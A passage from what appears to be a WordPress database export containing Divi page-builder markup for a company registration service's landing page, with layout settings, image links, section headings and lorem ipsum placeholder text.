background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Company Registrations</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"]<p>Select the type of company that best suits your needs</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Private Company\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover.jpg\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Private Company + Customized MOI\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Personal Liability Comapny\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>We Account For the All of the Biggest Product Categories</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_style=\"wave\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>A Proven Process Time &amp; Time Again</h2>\n<p>Vivamus suscipit tortor eget felis porttitor volutpat. Vivamus suscipit tortor eget felis porttitor volutpat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Praesent sapien</p>[/et_pb_text][et_pb_button button_text=\"Online Project Application\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#1ca5ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.24)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-15 14:51:24','2019-08-15 12:51:24','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(32674,3,'2019-08-13 10:54:17','2019-08-13 08:54:17','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Company Registrations</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"]<p>Select the type of company that best suits your needs</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Why Choosing The Right Company Is Important?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus. </p>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictu</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Personal Liability Company\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI \" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Private Company\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"3.25\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Private Company\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover.jpg\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" 